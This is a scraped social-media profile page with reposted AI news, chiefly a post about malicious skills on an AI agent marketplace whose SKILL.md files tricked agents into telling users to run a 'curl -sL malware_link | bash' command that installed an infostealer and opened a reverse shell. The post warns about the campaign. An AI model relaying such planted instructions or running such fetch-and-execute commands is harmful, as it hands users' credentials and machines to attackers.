
Malek
2.7K posts

Malek
@m41ek
Software Engineer | 9-9-6 Build in private











HR managers, investment bankers, and designers reading the anthropic announcement right now:

Quelle Masterclass sur l'IA, j'ai résumé le texte avec une vidéo. Je vous conseille vivement de la garder pour plus tard si vous n'avez pas le temps. Suivez @powl_d il est vraiment entrain de faire de grandes choses.

We’ve identified industrial-scale distillation attacks on our models by DeepSeek, Moonshot AI, and MiniMax. These labs created over 24,000 fraudulent accounts and generated over 16 million exchanges with Claude, extracting its capabilities to train and improve their own models.


the #1 most downloaded skill on OpenClaw marketplace was MALWARE it stole your SSH keys, crypto wallets, browser cookies, and opened a reverse shell to the attackers server 1,184 malicious skills found, one attacker uploaded 677 packages ALONE OpenClaw has a skill marketplace called ClawHub where anyone can upload plugins you install a skill, your AI agent gets new powers, this sounds great the problem? ClawHub let ANYONE publish with just a 1 week old github account attackers uploaded skills disguised as crypto trading bots, youtube summarizers, wallet trackers. the documentation looked PROFESSIONAL but hidden in the SKILL.md file were instructions that tricked the AI into telling you to run a command > to enable this feature please run: curl -sL malware_link | bash that one command installed Atomic Stealer on macOS it grabbed your browser passwords, SSH keys, Telegram sessions, crypto wallets, keychains, and every API key in your .env files on other systems it opened a REVERSE SHELL giving the attacker full remote control of your machine Cisco scanned the #1 ranked skill on ClawHub. it was called What Would Elon Do and had 9 security vulnerabilities, 2 CRITICAL. it silently exfiltrated data AND used prompt injection to bypass safety guidelines, downloaded THOUSANDS of times. the ranking was gamed to reach #1 this is npm supply chain attacks all over again except the package can THINK and has root access to your life


Open-source game engine Godot is drowning in 'AI slop' code contributions: 'I don't know how long we can keep it up' Many submissions contain nonsensical code changes, fabricated test results, and overly verbose descriptions typical of LLM output. Reviewing every new contributor's PR has become extremely time-consuming and demoralizing. Rémi Verschelde stated they may not be able to sustain the current level of manual vetting much longer.


🚨 : Magnus Carlsen a battu ChatGPT aux échecs sans perdre une seule pièce.






Mark Cuban on the next job wave. Customized AI integration for small to mid-sized companies. "Software is dead because everything's gonna be customized to your unique utilization. Who's gonna do it for them... And there are 33 mn companies in the US."


"we vibe coded our entire app and you can't even tell"


Spotify says it’s best developers haven’t written a single line of code since December It’s co-CEO on earnings call:












